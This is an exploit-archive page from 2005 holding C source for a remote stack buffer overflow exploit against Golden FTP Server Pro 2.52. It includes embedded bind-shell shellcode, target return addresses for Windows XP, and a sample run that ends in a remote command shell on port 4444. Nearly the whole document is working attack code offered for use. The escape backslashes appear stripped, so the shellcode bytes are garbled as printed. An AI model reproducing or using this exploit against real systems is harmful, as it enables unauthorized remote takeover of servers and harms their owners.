[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (2nd)
# Published : 2005-04-29
# Author : c0d3r
# Previous Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit
# Next Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (3rd)
/*
Golden FTP Server Pro remote stack BOF exploit
author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com
risk : highly critical
vender status : no patch released , all targets are vuln
package : golden-ftp-server-pro 2.5.0.0 and prior
advisory : http://secunia.com/advisories/15156/
vender address : www.goldenftpserver.com
timeline :
28 Apr 2005 : Public Disclosure
29 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
after running the exploit u need to restart the server after that
the server will be closed automatically then u will have a shell
on port 4444 . if u want to erase the crap just clean the GFTPpro.log
manually as mentioned in the advisory .
workaround : upgrade to newer version or use another FTP server .
compiled with visual c++ 6 : cl golden-ftp.c
greetz : IHSTeam members,exploit-dev mates,securiteam,str0ke-milw0rm
(C) IHS security 2005
*/
/*
D:projects>golden-ftp 127.0.0.1 21 0
-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r
[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 755 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully !
[+] restart the Ftp server then nc 127.0.0.1 4444
D:projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Program FilesGolden FTP Server Pro>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 755
// 5 byte user command + 332 byte NOP junk + 4 byte return address
// + 15 byte NOP + 399 byte shellcode
// using metasploit great shellcode LPORT=4444 Size=399
unsigned char shellcode[] =
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85"
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19"
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05"
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0"
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74"
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15"
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14"
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53"
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce"
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf"
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb"
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18"
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6"
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16"
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f"
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c"
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18"
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f"
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8"
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e"
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f"
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27"
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2"
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a"
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";
unsigned int rc,rc2,sock,os,addr ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
unsigned char *recvbuf;
char buffer[size];
char jmp_esp[5];
unsigned short port;
char hex1[] = "x75x73x65x72x20";
char hex2[] = "x70x61x73x73x20x61x61x61x61";
char hex3[] = "x5Cx6E";
char winxpsp1[] = "x57x94xAEx77"; // shell32.dll :D
char winxpsp2[] = "xEDx1Ex94x7C"; // not tested
int main (int argc, char *argv[]){
if(argc < 3) {
printf("n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3rn");
printf("-------- usage : golden-ftp.exe host port targetn");
printf("-------- target 1 : windows xp service pack 1 : 0n");
printf("-------- target 2 : windows xp service pack 2 : 1n");
printf("-------- eg : golden-ftp.exe 127.0.0.1 80 0nn");
exit(-1) ;
}
printf("n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3rnn");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(jmp_esp,winxpsp1);
break;
case 1:
strcat(jmp_esp,winxpsp2); // wasnt checked
break;
default:
printf("n[-] this target doesnt exist in the listnn");
exit(-1);
}
// Creating heart of exploit code
printf("[+] building overflow string");
memset(buffer,NOP,size);
memcpy(buffer,hex1,sizeof(hex1)-1);
memcpy(buffer+337,jmp_esp,sizeof(jmp_esp)-1);
memcpy(buffer+356,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
// EO heart of exploit code
recvbuf = malloc(256);
memset(recvbuf,0,256);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %sn",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("n[+] attacking host %sn" , argv[1]) ;
printf("[+] packet size = %d byten" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] connectedn") ;
printf("[+] sending the overflow stringn") ;
rc2=recv(sock,recvbuf,256,0);
Sleep(1000);
send(sock,buffer,strlen(buffer),0);
send(sock,"n",1,0);
rc2=recv(sock,recvbuf,256,0);
Sleep(1000);
send(sock,hex2,strlen(hex2),0);
send(sock,"n",1,0);
printf("[+] exploit sent successfully !n");
printf("[+] restart the Ftp server then nc %s 4444nn",argv[1]);
}
else {
printf("[-] ouch! Server is not listening .... nn");
}
shutdown(sock,1);
closesocket(sock);
}
// EO exploit code
// www.Syue.com [2005-04-29]